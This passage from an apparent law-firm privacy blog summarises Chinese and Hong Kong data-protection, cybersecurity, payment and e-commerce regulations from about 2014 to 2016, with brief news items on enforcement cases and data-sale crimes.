Network operators will be required to comply with social morals and business ethics, and will be subject to governmental and public supervision. In addition, network operators will be required to preserve web logs for at least six months, and cooperate with the supervision and inspection of competent government authorities.

China Publishes Provision to Regulate Internet Search Services

On June 25, 2016, the Cyberspace Administration of China published its new Administrative Provisions on Internet Information Search Services (the “Provisions”). The Provisions will come into effect on August 1, 2016.

Under the Provisions, Internet information search service providers (“service providers”), which include operators of search engines, are required to adopt information security management systems, such as systems enabling the review of information, real-time inspection of public information and protection of personal information.

Under the Provisions, service providers are prohibited from showing subversive and obscene content and other content prohibited by law and regulation. If legally prohibited content shows up in a search result, service providers should block the result and report it to the Cyberspace Administration.

In addition, service providers should provide search results that are objective, impartial and authoritative. When providing paid search results, service providers must review the qualifications of the paying clients and clearly identify paid results and natural search results, attaching clearly evident marks to paid search results on an item by item basis.

The release of the Provisions was triggered by the death of a young man, who chose a hospital based on an Internet search on Baidu (a popular search engine in China), but received ineffective hospital treatments and therapy that was not yet fully approved.

Draft E-Commerce Standards Published for Comment in China

On March 22, 2016, the Ministry of Commerce of the People’s Republic of China published drafts of its proposed (1) Specifications for Business Services in Mobile E-commerce (“Mobile E-commerce Specifications”) and (2) Specifications for Business Services in Cross-border E-commerce (“Cross-border E-commerce Specifications”). A public comment period on these drafts is now open. Comments will be accepted until May 31, 2016.

The Mobile E-commerce Specifications contain several provisions that require service providers in the e-commerce sector to take measures to ensure the security of operational data and service platforms. According to the Mobile E-commerce Specifications, “service providers in the electronic commerce sector” refers to platform service providers who provide e-commerce transaction platforms that are accessed over mobile devices. The Mobile E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics services providers, payment service providers and purchasers via mobile devices.

Under the draft specifications, platform service providers would be responsible for the handling of transaction information and relevant personal information from online sellers. The authorization of the data subject would be required before collecting and processing personal information. The collection of transaction information would have to be authorized by the parties to the transaction.

In addition, personal and transaction information may not be directly used for commercial purposes unless it has been desensitized. Platform service providers could, with the consent of an online seller, transfer, copy, transmit or process desensitized data from the online seller. Personal information would have to be encrypted before being transferred online. Also, a record must be maintained of any disclosures of personal and transaction data to administrative authorities, enforcement authorities or the judiciary.

Platform service providers also would be responsible for the management of the platform’s data security. Personal data from online sellers should be isolated on the platform, and only the data owner should have access to the data. Modifications to original data stored on the platform should be authorized only by the data subject. Platform service providers would be responsible for protecting personal data from online sellers from loss.

The Cross-border E-commerce Specifications would impose similar requirements and obligations in a separate, but closely related, category and would apply the same obligations under the Mobile E-commerce Specifications to e-commerce service providers who provide e-commerce transaction platforms for the purchase and sale of cross-border goods. The Cross-border E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics providers, payment service providers and purchasers of cross-border goods.

CIPL, Hunton & Williams, TRUSTe to Represent U.S. Business on APEC E-Commerce Business Alliance Expert Council

During last week’s APEC privacy and e-commerce meetings in Lima, Peru, the APEC E-Commerce Business Alliance (“ECBA”) established its 2nd APEC E-Commerce Business Alliance Expert Council (“Expert Council”). The ECBA Expert Council is comprised of 32 e-commerce experts from government, academia and the private sector in the APEC region. The U.S. members are Markus Heyder, Vice President and Senior Policy Counselor at the Centre for Information Policy Leadership, Manuel “Bing” Maisog, partner at Hunton & Williams, and Joshua Harris, Director of Policy at TRUSTe.

The APEC-ECBA was created in 2001 to (1) promote cooperation between the public and private sectors in the field of e-commerce, (2) provide a forum for information sharing between APEC member economies, and (3) develop e-commerce across different industry sectors. ECBA’s secretariat is based in the China International E-Commerce Center, a quasi-public agency under China’s Ministry of Commerce. The first ECBA Expert Council was formed in 2010 to strengthen and support ECBA’s mission through research, reports, training and other initiatives. ECBA holds annual conferences for the Expert Council and other APEC-based government and private sector stakeholders.

In late June or early July 2016, ECBA will hold its 6th APEC E-Commerce Business Alliance Forum called “Realize Inclusive Trade Through Cross-Border Electronic Commerce.” This three-day event will be held in China, either in Jinjiang, Fujian Province or Mianyang, Sichuan Province.

China Enacts Administrative Measures for Online Payment Businesses

On December 28, 2015, the People’s Bank of China published Administrative Measures for Online Payment Business of Non-bank Payment Institutions (the “Measures”). The Measures were enacted to provide further details on the regulation of online payment businesses, in supplement to the earlier Administrative Measures for the Payment Services of Non-financial Institutions (the “2010 Measures”), published by the People’s Bank of China on June 14, 2010. The 2010 Measures regulated the conduct of all payment services, including both online payment methods and three other types of payment methods, by all types of Non-bank Payment Institutions (“NBPIs”). The newer Measures are more focused and apply only to online payment methods, and only to NBPIs which have already obtained a Payment Business License and are engaged in an online payment business.

The impact of the Measures will reach beyond the payment market itself to promote the development of the e-commerce and Internet finance sectors in China. The Measures will come into effect on July 1, 2016. Consistent with the 2010 Measures, the new Measures require NBPIs to take effective protective measures for the security of their clients’ personal information, and to adopt risk control systems. The Measures further restrict the storage of clients’ sensitive information, such as track information or chip information of their clients’ bank cards, their verification codes or passwords. In principle, NBPIs are not allowed to store the effective term of the bank cards, unless they are stored for special business needs or pursuant to authorization by the clients and the banks opening the bank cards. Further, this information must be encrypted prior to storage.

Under the Measures, NBPIs are required to collect, use, store and transfer clients’ information only to the minimum extent necessary, and to notify clients of the purpose and scope of their use of the information. The Measures restrict NBPIs from providing clients’ information to other institutions or individuals, unless otherwise required by laws and regulations, or unless the provision of each item was confirmed and authorized by the clients.

The Measures also impose responsibilities on the NBPIs to bind the merchants which are counterparties to their online payment services. NBPIs are required to sign agreements with the merchants, prohibiting the merchants from storing sensitive information of their clients, and to adopt supervisory measures, such as periodic checks and technical monitoring, as may be necessary. If the merchants store sensitive information in violation of the agreement, the NBPIs are required to promptly suspend or terminate their provision of online payment services for these merchants, and adopt effective measures to delete the sensitive information and to prevent disclosure of it. The NBPIs also may be liable for losses and liabilities caused by the disclosure of relevant information.

The Measures further require NBPIs to maintain online payment business processing systems that are safe and comply with normative specifications, and related backup systems, within the territory of China. When providing services for domestic transactions, NBPIs are required to complete the transactions using their domestic business processing systems, and to complete the financial settlement within the territory of China.

Anti-Terrorism Law Enacted in China

On December 27, 2015, the Standing Committee of the National People’s Congress of the People’s Republic of China published the P.R.C. Anti-Terrorism Law. The law was enacted in response to a perceived growing threat from extremists and terrorists, particularly in regions in Western China, and came into effect on January 1, 2016.

As its name suggests, the main goal of the law is to strengthen national security and to prevent terrorism. The law defines terrorism and declares it to be illegal, authorizing both civil and criminal sanctions. The law also takes certain actions that promote its objectives, such as (1) allowing for the designation of certain organizations as terrorist organizations, (2) establishing institutions such as a counter-terrorism intelligence agency and counter-terrorism units of the armed police forces and of the People’s Liberation Army to allow for the requisition of property in urgent circumstances, (3) mandating a system for incident response planning and (4) providing for international cooperation. It also empowers public security agencies to take actions such as launching investigations and even using weaponry in emergency or dangerous circumstances.

Certain provisions in the law require telecommunications system operators and Internet service providers to provide technical support and assistance, such as access to their technical interfaces and assistance with decryption, to public security and state security authorities which may be conducting investigations of terrorist activities or taking action to prevent them. The law also requires telecommunications system operators and Internet service providers to adopt network security systems and information content monitoring systems to prevent the dissemination of information containing terrorist or extremist content over their systems. If they discover information with terrorist or extremist content being disseminated over their systems, they must halt the dissemination, close the relevant websites, keep records of the incident and make a report to the relevant public security organizations. A fine of more than RMB ¥500,000 may be imposed on telecommunications system operators and Internet service providers who fail to provide technical interfaces, decryption and other technical support or assistance to competent government agencies, and the person in charge may be subject to a fine of up to RMB ¥500,000 and possibly detention of up to 15 days.

The Anti-Terrorism Law permits the People’s Liberation Army to get involved in anti-terrorism operations overseas. It also restricts the right of media of various types to report the details of terrorist attacks. For instance, social media cannot report on details of terror activities that might inspire copycat attacks, and cruel and inhuman scenes cannot be depicted in their reports.

The Anti-Terrorism Law contains several provisions that are significant in the context of personal information protection. For instance, the law requires railway, road, water and air transport operators and postal offices, couriers or other logistics operators to conduct an examination of the identities of their clients, and to perform security checks and visual checks on the articles they transport and deliver. An operator listed above which fails to comply with the foregoing obligations may face a fine of up to RMB ¥500,000 (approximately $76,250 USD at current exchange rates), and the person in charge may face a fine of up to RMB ¥100,000.

Service providers in certain industry sectors, such as the telecommunications, Internet, finance, hotel, long-distance passenger transportation and automobile leasing sectors, are required to conduct an examination of the identities of their clients as well. Service providers which fail to examine their clients’ identities, or provide services to those who refuse to make this examination, may be subject to fines of more than RMB ¥500,000. The person in charge may face a fine of up to RMB ¥500,000.

The law permits the collection of financial personal information, including information that would be considered sensitive personal information in other jurisdictions, for purposes of investigating suspected terrorist activities. For instance, during such investigations public security organizations have the authority to investigate the financial information of suspects, such as information relating to their bank deposits and stock and bond holdings. Also during an investigation, public security organizations are given the authority to collect information about suspects including their portrait, fingerprints, iris images and biological samples such as blood samples. In addition, government authorities and other entities or individuals that may be involved are required to keep in confidence any state secret, trade secret or private personal information which may be obtained during the performance of their anti-terrorism investigations.

The Anti-Terrorism Law defines circumstances in which state security organizations have authority to collect personal information. In such circumstances, when there is a conflict with other data privacy regulations that may otherwise prohibit collection, the Anti-Terrorism Law presumably would control. The Anti-Terrorism Law represents a further step in the sector-by-sector development of China’s data privacy framework.

China Publishes New Regulation for Personal Data Security in the Courier Industry

On November 16, 2015, the Legislative Affairs Office of the State Council of the People’s Republic of China published a draft Regulation for Couriers (the “Regulation”) and requested public comment on the Regulation. Interested parties have until mid-December 2015 to submit comments on the Regulation. The Regulation comes at a time when courier services and online shopping are growing steadily in China. Under the Regulation, the sender of a parcel will be required to fill in his or her real name and address, the telephone numbers of both the sender and the recipient, as well as the name, quantity and nature of the object being couriered.

The courier company would then be required to verify that information. The courier company also would be required to refuse orders with false information on the waybill. If a courier company fails to check the waybill or accepts parcels with false information on the waybill, it may be subject to a maximum fine of RMB 10,000 (approximately $1,586).

The Regulation also would require courier companies to regularly destroy waybills to protect client personal information. In addition, courier companies will be prohibited from illegally selling or leaking client personal information they collect in the course of providing services. In cases of actual or potential leakage, destruction or loss of client personal information, courier companies would be required to take immediate remedial measures and report the incident to the local postal administration authority.

A courier company that breaches the foregoing obligations may face administrative penalties including the issuance of a warning, confiscation of illegal income, a maximum fine of RMB 50,000 (approximately $7,840) and possibly even revocation of its operating license.

In addition, if a courier company opens parcels without permission, hides, destroys, sells or illegally inspects parcels, it will be subject to a maximum fine of RMB 200,000 (approximately $31,360). In exceptional circumstances, its operating license also may be revoked.

Hunton Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Hunton & Williams is pleased to announce its participation with the Global Legal Group in the publication of the second edition of the book The International Comparative Legal Guide to: Data Protection 2015. Members of the Hunton & Williams Global Privacy and Cybersecurity team prepared several chapters in the guide, including the opening chapter on “Legislative Change: Assessing the European Commission’s Proposal for a Data Protection Regulation,” and chapters on Belgium, China, France, Germany, the United Kingdom and the United States.

The guide provides privacy officers and in-house counsel with a comprehensive overview and analysis of data protection laws and regulations around the world. It begins with the first chapter on the proposed European legislative reform and then covers existing laws and regulations in 32 jurisdictions.

Bridget Treacy, partner and head of the UK Privacy and Cybersecurity practice, served as the contributing editor of the guide and co-authored the United Kingdom chapter. Additional Hunton & Williams authors included: Anita Bapat (United Kingdom), David Dumont (Belgium), Claire François (France), Dr. Jörg Hladjk (Germany), Chris D. Hydak (United States), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium) and Aaron P. Simpson (United States).

Hunton & Williams’ Global Privacy and Cybersecurity practice group assists organizations in managing privacy and data security risks associated with the collection, use and disclosure of consumer and employee personal information. Hunton & Williams has been ranked as the top law firm globally for privacy and data security by Computerworld magazine in all of its surveys, and has been rated by Chambers and Partners as the top privacy and data security practice in its Chambers Global, Chambers Europe, Chambers UK and Chambers USA guides.

The privacy practice also maintains The Centre for Information Policy Leadership, a privacy think tank and consulting practice that leads public policy initiatives that promote responsible information governance necessary for the continued growth of the information economy.

Read the full news release.

Draft Cybersecurity Law Published for Comment in China

On July 6, 2015, the Standing Committee of the National People’s Congress of the People’s Republic of China published a draft of the country’s proposed Network Security Law (the “Draft Cybersecurity Law”). A public comment period on the Draft Cybersecurity Law is now open until August 5, 2015.

At this point, the Draft Cybersecurity Law has not yet been finalized. The draft contains, however, a number of provisions that are significant, insofar as they reveal underlying assumptions and priorities that govern the development and promotion of cybersecurity in China. If even a handful of these provisions make their way into the final version, the law could prove itself to be consequential.

One such provision actually manifests in a number of clauses that firmly and clearly establish the government’s leading role in the furtherance of cybersecurity. In the Draft Cybersecurity Law, certain, relevant private firms are referred to as “network operators” and “operators of key information infrastructure.” Regardless of their technological resources and practical experience, these operators are required by the Draft Cybersecurity Law to support and cooperate with the government’s leading role in the furtherance of cybersecurity, rather than exercising a leading role of their own.

Another striking provision is one that would allow government bodies at certain levels to adopt measures to restrict the transmission of information over the Internet in places where public safety “incidents” (referred to somewhat euphemistically as “社会安全事件”) have erupted. This may be done to preserve the national security and public social order. It may become difficult to contact someone via the Internet who is in a place where such an “incident” has recently occurred. Already in practice in affected areas where there has been a “public safety incident,” short messaging services are usually restricted, and ingoing and outgoing telephone calls are strictly supervised.

The Draft Cybersecurity Law also includes a provision that pushes China towards a policy of data localization. Pursuant to this provision, important data (such as the personal information of citizens) must be stored within the territory of the People’s Republic of China. Notably, the restriction appears to be limited and would apply only to operators of key information infrastructure, largely enterprises in heavily licensed and regulated industries such as providers of basic and value-added telecommunications services, energy, utilities and health care services. The provision also appears to allow for cross-border transfers even by operators of key information infrastructure when there is an operational requirement for the transfer, as long as a security assessment has been conducted. The precise requirements of the security assessment, however, are not spelled out in the Draft Cybersecurity Law.

There are many other significant provisions in this potentially impactful draft law, including some that reiterate rules for the handling of personal data by requiring network operators to observe strict confidentiality and to not disclose, falsify, destroy, sell or illegally provide personal information of citizens which they have collected. Another provision requires network operators who collect personal information to do so only in a lawful and proper manner, to collect only what is necessary, to clearly state the purposes, method and scope of the collection and to obtain the consent of the data subject. Many of these provisions overlap with some of the requirements on the handling of “electronic personal information” imposed by the December 2012 Resolutions.

We will report further on the content of the law, particularly after the final version has been published.

Hong Kong Privacy Commissioner Hosts 43rd APPA Forum and Big Data Conference

On June 11 and 12, 2015, Asia Pacific Privacy Authority (“APPA”) members, invited observers and guest speakers from the government, private sector, academia and civil society, met in Hong Kong to discuss privacy law and policy issues at the 43rd APPA Forum. At the end of the open session on day two, APPA issued its customary communiqué, setting forth the highlights of the discussions of the open and closed sessions. The Hong Kong Privacy Commissioner, who hosted the APPA meeting, also hosted a conference on big data and privacy on June 10.

According to the Communiqué, during the closed session, APPA members and invited observers discussed numerous issues of common interest, including legal reforms across the region, law enforcement and investigation matters, breach notification and transparency in reporting requests from law enforcement and national security authorities to companies for personal information. During the closed session, privacy developments in other international fora and groups, such as APEC, the International Conference of Data Protection and Privacy Commissioners, GPEN and the Ibero-American Network of Data Protection were also discussed. Finally, attendees of the closed session discussed privacy issues associated with big data and behavioral advertising, the regulation of public domain data and organizational accountability.

During the open session, APPA members and observers were joined by local and international privacy experts, including representatives from the Centre for Information Policy Leadership at Hunton & Williams LLP (“CIPL”), to discuss issues relating to data management and use in the modern information age. Other topics of discussion included updates on privacy laws in China and Taiwan, managing research data, open data and access to open data, health data and privacy, and smart cities and IT.

The previous day, the Hong Kong Privacy Commissioner hosted the International Conference on Big Data from a Privacy Perspective. The public event was attended by many privacy commissioners, as well as privacy professionals and industry representatives from across the Asia-Pacific region. The conference considered the benefits and risks of Big Data in a data driven world and how the industry should innovate and find new ways to provide transparency to individuals. The CIPL delegation participated in a panel discussion entitled Big Data and Emerging Best Practices for a Win-Win Situation: Protecting Privacy and Enabling Benefits in a Data Driven Economy, and offered solutions and best practices.

APPA is the principal forum for privacy authorities in the Asia-Pacific Region. APPA members meet twice a year to discuss recent developments, issues of common interest and cooperation.

China’s Ministry of Industry and Information Technology Published Rules Governing Use of Text Messaging

On May 19, 2015, China’s Ministry of Industry and Information Technology promulgated its Provisions on the Administration of Short Messaging Services (the “Provisions”), which will take effect on June 30, 2015.

Prepared to combat improper texting practices, such as junk short messages, the Provisions were adopted under the July 2014 People’s Republic of China (“P.R.C.”) Telecommunications Rules (“2014 Revision”) and the December 2012 Resolution of the Standing Committee of the National People’s Congress Relating to Strengthening the Protection of Information on the Internet for purposes of (1) normalizing conduct related to short messaging services (“SMS”), (2) protecting the lawful interests of users, and (3) promoting the sound development of a market for SMS.

The Provisions are important in several ways. First, they establish certain basic operating requirements which SMS providers must observe in their text messaging campaigns. Under these requirements:

  • SMS providers must hold a telecommunications enterprise license;
  • when SMS providers charge user fees, the charges must be made in accordance with applicable laws, regulations and standards;
  • SMS providers must maintain records of the times of transmission, user receipts and when a user unsubscribes; and
  • SMS providers must not use SMS systems to circulate or broadcast illicit content.

Second, the Provisions establish more detailed rules (for example, compared to the earlier amendment to the P.R.C Law on the Protection of the Interests of Consumers or its implementing measures published on January 5, 2015) on the manner in which text messages may be sent to consumers. Under the Provisions’ rules:

SMS providers and short messaging content providers must not send commercially-purposed text messages to end users without their consent or request;

  • when end users provide their consent, the type, frequency and duration of the planned broadcast campaign must be made clear;
  • commercially-purposed text messages must not be sent to certain (non-commercially oriented) ports;
  • commercially-purposed text messages must include an expedient and effective method for unsubscribing; and
  • SMS providers must establish a system for supervising text messages, and an early warning and monitoring mechanism.

In addition to the foregoing rulemaking, the Provisions establish practical channels by which consumer interests could be protected. These include:

  • The Provisions establish a system by which consumers can make complaints and file reports. They establish a reporting and handling center under the auspices of the Ministry of Industry and Information Technology, through which reports of “nasty” (不良) or junk short messages can be processed. They also clarify procedures under which infringements and violations involving text messages can be handled, and under which punishments can be meted out.
  • The Provisions strengthen the oversight and inspection system. They clarify the authority and duty of the regulatory authority to carry out oversight and inspection, and the corresponding duties of SMS providers.
  • The Provisions establish penalties for unlawful behavior among SMS providers, short messaging content providers, personnel of the supervisory authority, and personnel of the reporting and handling center. Violations are subject to being recorded in a permanent file, and responsible persons may be subject to “supervisory discussion.”

Apart from regulating conventional SMS, the Provisions also extend to information delivery services similar to SMS that use the Internet. Article 38 of the Provisions provides that delivery services which send information having the characteristics of a short message (for example, text, data, voice or images) to fixed telephones, mobile telephones and other communications end-users, via the Internet, shall be conducted with reference to the Provisions.

By their terms, the Provisions only affect the use and transmission of text messages. This makes them rather specific in their scope and impact. The Provisions have, however, the potential to materially increase operational requirements for those companies which rely on the use of text messages. They also clarify how such companies may be held accountable.

In the abstract, the Provisions are a particularly fine-grained illustration of China’s ongoing reliance on a sector-by-sector approach to the development of its regulatory framework on personal information.

American Chamber of Commerce in China Publishes Policy Spotlight Report on Protecting Data Flows between China and the U.S.

On April 14, 2015, the American Chamber of Commerce in China (“AmCham”) published a report, entitled Protecting Data Flows in the US-China Bilateral Investment Treaty (the “Report”). The Report is part of AmCham’s Policy Spotlight Series. While in principle addressed to the U.S. and Chinese teams that are currently negotiating the Bilateral Investment Treaty, the Report has been made public. It thereby provides insight into the emerging issue of data localization for the benefit of a much wider audience.

The Report analyzes the impact of data localization policies, challenging the widely held (but potentially false) belief that greater data security can be achieved through local storage of personal data. In challenging this belief, the Report highlights the magnitude of the possible adverse economic impact of data localization policies and their potential effect on innovation. The Report contrasts data localization policies against the more liberal policies that are intended to foster freer international flows of personal information, which have been adopted in several jurisdictions in the Asia-Pacific region. The Report concludes by advocating against the adoption of data localization policies, recommending instead the inclusion in the Bilateral Investment Treaty of provisions that would foster and protect international transfers of data by service providers.

Hunton & Williams and its Centre for Information Policy Leadership (“CIPL”) participated closely in the drafting of the Report. The final document reflects policy positions taken from the international perspectives frequently advocated by CIPL and lawyers at Hunton & Williams. The Report also includes a clear reference to the Accountability principle, a concept CIPL helped develop as a guiding principle to govern cross-border data flows. In addition, the Report conspicuously references the APEC Cross-Border Privacy Rules system.

The Report was publicly released at a panel discussion event held at AmCham’s facility in Beijing on April 14.

In May and June of this year, delegations from CIPL will travel to Singapore and Hong Kong to meet with data protection authorities, and further expound upon and advocate the adoption internationally of the Accountability principle. These will be the next steps in CIPL’s continuing advocacy for robust cross-border data flows, and against data localization policies, in the Asia-Pacific region.

China’s State Administration for Industry and Commerce Publishes Measures Defining Consumer Personal Information

On January 5, 2015, the State Administration for Industry and Commerce of the People’s Republic of China published its Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers (the “Measures”). The Measures contain a number of provisions defining circumstances or actions under which enterprise operators may be deemed to have infringed the rights or interests of consumers. These provisions are consistent with the basic rules in the currently effective P.R.C. Law on the Protection of Consumer Rights and Interests (“Consumer Protection Law”). The Measures will take effect on March 15, 2015.

Article 11 of the Measures provides a list of actions that enterprise operators may not undertake because they infringe upon the personal information of consumers. In October 2013, we reported on the amendment to the Consumer Protection Law which extended the protections of personal information to consumer personal information. The list provided in Article 11 of the Measures is similar in concept to the amendment to the Consumer Protection Law.

Although the list itself does not contain any surprises, Article 11 is nevertheless potentially an important development because it provides a definition of “consumer personal information.” (The amendment to the Consumer Protection Law omitted a definition of this term.) According to Article 11, “consumer personal information” refers to “information collected by an enterprise operator during the sale of products or provision of services, that can, singly or in combination with other information, identify a consumer.” Article 11 also provides a list of specific examples of “consumer personal information,” including a consumer’s “name, gender, occupation, birth date, identification card number, residential address, contact information, income and financial status, health status, and consumer status.”

While this definition applies only in relation to consumer personal information, it is an instructive milestone in the continuing emergence of China’s sector-by-sector patchwork of rules and regulations governing the collection and use of personal information.

Hong Kong Privacy Commissioner Publishes Guidance on Cross-Border Data Transfers

On December 29, 2014, the Hong Kong Office of the Privacy Commissioner for Personal Data published guidance (the “Guidance Note”) on the protection of personal data in cross-border data transfers. The Guidance Note was released in light of the Privacy Commissioner’s intention to elaborate on the legal restrictions governing cross-border data transfers in Hong Kong, though these have not yet gone into effect.

Although the Hong Kong Personal Data (Privacy) Ordinance (the “Ordinance”) contains a provision (“Section 33”) imposing restrictions on cross-border data transfers, this provision did not go into effect when the rest of the Ordinance was enacted in 1995. Consequently, there currently is no effective legal restriction on cross-border data transfers in Hong Kong. As such, the new Guidance Note published by the Privacy Commissioner is voluntary and not binding. The Privacy Commissioner intends for the Guidance Note to be a practical guide that helps data users prepare for the cross-border data transfer restrictions of Section 33. The Privacy Commissioner noted, however, that no firm date has been set for Section 33 to go into operation.

Notably, the Guidance Note provides recommended model contractual clauses for cross-border data transfers of personal data outside of Hong Kong. The Privacy Commissioner’s Office does not require that the recommended model clauses be used verbatim. Instead, the Guidance Note advises the parties to make revisions or additions according to their own commercial needs.

FTC Warns Foreign-Based App Developer of Potential COPPA Violations

On December 22, 2014, the Federal Trade Commission announced that it notified China-based BabyBus (Fujian) Network Technology Co., Ltd., (“BabyBus”) that several of the company’s mobile applications (“apps”) appear to be in violation of the Children’s Online Privacy Protection Rule (the “COPPA Rule”). In a letter dated December 17, 2014, the FTC warned BabyBus of potential COPPA violations stemming from allegations that the company has failed to obtain verifiable parental consent prior to its apps collecting and disclosing the precise geolocation information of users under the age of 13.

BabyBus offers more than 60 free mobile apps marketed to children between the ages of one and six on popular app marketplaces in the U.S. In its letter, the FTC alleges that BabyBus apps are directed to children under the age of 13 in the U.S., and therefore, the foreign-based company is required to comply with the COPPA Rule by obtaining verifiable parental consent before collecting, using or disclosing the precise geolocation information of its users who are under the age of 13 in the U.S.

The letter recommends that BabyBus review all of its apps in order to ensure that the company lawfully collects personal information from children in accordance with the COPPA Rule’s legal requirements. Furthermore, the letter indicates that the FTC plans to review BabyBus apps again next month.

Chinese Supreme People’s Court Issues Interpretations Regarding the Publication of Personal Information on the Internet

In October 2014, the People’s Republic of China Supreme People’s Court issued interpretations regarding the infringement of privacy and personal information on the Internet. The interpretations are entitled Provisions of the Supreme People’s Court on Several Issues concerning the Application of the Rules regarding Cases of the Infringement of Personal Rights over Information Networks (the “Provisions”) and became effective on October 10, 2014.

China has not implemented a comprehensive data protection law. Rather, data protection and privacy are regulated through several sector-specific laws. Consistent with the sector-specific nature of the Chinese data protection framework and the Resolution on Strengthening the Protection of Information on the Internet, promulgated by the National People’s Congress in December 2012, the Provisions focus on the protection of personal information on the Internet.

In addition to providing rules on determining when Internet service providers were “aware” of an infringement, rules on determining fault arising from reprinting, unauthorized modification or deletion of personal information, and rules on relevant procedures for legal proceedings, the Provisions also attempt to describe the scope of information that is subject to its requirements, although they fall short of providing a definition of “personal information.” The contours of information covered by the Provisions likely will be further clarified as judges apply the Provisions to individual cases.

In general, the Provisions prohibit Internet users and Internet service providers from using the Internet (or other information networks) to disclose or publish personal information. The personal information protected by this prohibition includes, at a minimum, personal genetic information, medical records, health examination materials, criminal records, home addresses and information regarding private activities. Disclosure or publication on the Internet (or other information network) may be permissible, however, if:

  • The relevant individual consented in writing;
  • The disclosure or publication is in the public interest to a necessary extent;
  • An educational or scientific entity makes the disclosure or publication for purposes in the public interest, academic research or statistical analysis, the relevant individuals have consented in writing to the publication or disclosure and the method of disclosure or publication will not result in the identification of any individual;
  • The relevant personal information has already been published by the individual on the Internet, or has already become public via other means; or
  • The personal information is obtained through legitimate methods.

If the disclosure or publication falls into one of the final two categories identified above, however, the individual or entity that makes the disclosure or publication may be liable civilly if the method of publication violates the public interest or social morality, or if the publication harms a material interest of the individual whose personal information is disclosed or published.

Foreign Couple Found Guilty of Illegal Collection of Personal Information in Shanghai

On August 8, 2014, a court in Shanghai found a foreign couple guilty of illegal collection of personal information. British national Peter Humphrey was sentenced to two and a half years of imprisonment and a fine of RMB 200,000, and his wife was sentenced to two years of imprisonment and a fine of RMB 150,000. In addition, Humphrey will be deported after serving his term.

According to Chinese press reports, the defendants established a company in Hong Kong called ChinaWhys Co., Ltd. in 2003 and a company in Shanghai called Shelian Consultancy (Shanghai) Co., Ltd. in 2004. Using these company names, the defendants investigated many businesses and individuals for their clients, which mainly consisted of Chinese subsidiaries of multinational companies. The defendants purchased various types of personal information of Chinese citizens and used the information to prepare investigative reports, which they then sold to their clients.

This verdict, while newsworthy because of the involvement of foreign defendants, does not really break new legal ground in China. We have previously reported on amendments to the P.R.C. Criminal Law that established criminal penalties for improper sales, provision and collection of personal data. We also have reported on criminal sentences in cases involving the sale of personal data. The legal theories and arguments advanced in this case are well-established and not considered “grey areas” in Chinese law. For instance, foreign-related social and market investigations are subject to strict regulations, and the collection of personal information must be conducted carefully to comply with the law. In this case, the court rejected the defendants’ argument that their illegal investigation was justified because they undertook their actions for legal objectives.

There are other ways, however, in which the verdict may break new ground or lead to new practices. This case is reportedly the first in China involving a foreign (or at least Western) defendant found guilty of illegal collection of personal information. It is also worth noting that the defendants were arrested in August 2013, not long after one of their prominent clients came under investigation by the Chinese government for alleged bribery. Reportedly, this case is merely a small part of that larger bribery investigation.

The verdict will have an impact on business practices involving due diligence investigations, especially those performed for international firms. In an article published by The Wall Street Journal about the verdict, Hunton & Williams Partner Manuel Maisog noted that “It’s not just that the tactical business practices need to change, it’s the mind-set.” The verdict also may make senior business officers apprehensive about using this kind of investigative service to obtain information about their business partners or employees. While the lasting impact of this verdict will most probably unfold over the coming months or years, the old business models used by investigatory firms hired to conduct due diligence have become far riskier, and now can only be employed, if at all, with great caution.

FBI indicts five members of the Chinese military for hacking US companies

Eric Holder yesterday announced: “Today, we are announcing an indictment against five officers of the Chinese People’s Liberation Army for serious cybersecurity breaches against six American victim entities.” The five officers are known by the aliases UglyGorilla, Jack Sun, Lao Wen, hzy_1hx and KandyGoo. They are members of the PLA’s military unit 61398 (you may […]

Chinese Postal Bureau Issues Personal Information Protection Rules

In March 2014, the State Postal Bureau of the People’s Republic of China (the “SPBC”) formally issued three rules (the “Rules”) establishing significant requirements regarding the protection of personal information: (1) Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users (the “Security Provisions”); (2) Provisions on the Reporting and Handling of Security Information in the Postal Sector (the “Reporting and Handling Provisions”); and (3) Provisions on the Management of Undeliverable Express Mail Items (the “Management Provisions”). The Rules, each of which became effective on its date of promulgation, were issued in draft form in November 2013 along with a request for public comment.

The latest versions of the Rules generally retain most of what was contained in the original drafts. No material alterations were made to the personal information protection provisions, although some minor changes were made to the wording and the sequence of certain sentences was changed for conformity. Notably, the Security Provisions:

  • create a coherent framework for information security in postal and express delivery services;
  • define the “personal information of postal and delivery service users” (the “Users’ Information”); and
  • clarify the purpose and scope of application of the Security Provisions and the allocation of responsibilities in the event of information security incidents.

The Security Provisions also take a major step forward in encouraging enterprises to optimize information security management processes and use technical means to reduce the risks of disclosures of Users’ Information.

In addition to alleviating problems arising from the misappropriation of personal information used for postal and express delivery service purposes, the Rules also represent a positive development in China’s data protection legal regime and are the most recent addition to an expanding array of sector-specific regulations governing personal information in China. Companies operating in the postal delivery sector may need to modify and improve their business processes and service strategies to comply with the Rules.

Recent Data Breach Events in China

In recent months, the Chinese government has devoted attention to the protection of personal information with, as we previously reported, the promulgation of a number of new data protection regulations. This focus is also illustrated by recent actions related to crimes involving personal information.

Gang Selling Personal Information Busted

Police apprehended a 10-member gang in Beijing and Shanghai for illegally obtaining and selling nearly one million pieces of personal information. The gang made over RMB 320,000 in illegal profits from their activity.

In mid-August of this year, a woman in Shanghai filed a complaint with the police, claiming that her personal information was improperly disclosed after she had applied for an online exam. After applying, the woman received spam messages relating to training classes in the same subject matter. Zhabei District police investigated online message platforms, and targeted an education information consulting company as the source of the spam messages. When police apprehended the owner in the Pudong New Area, he said that he had bought the personal information from an unemployed local resident, who was then apprehended in the same district. Further investigation showed that this local resident had obtained the information from a man who was responsible for maintaining a national examination application website. This person had sold the data to the local resident, who then resold them to the education company owner and a few others, including the owners of another education company and a cultural communications company.

Courier Firm Staff under Suspicion of Large-Scale Customer Data Theft

Staff at a leading Shanghai courier firm, YTO Express, are suspected of selling millions of items of personal information about its customers to online traders, who then sold the information to online retailers.

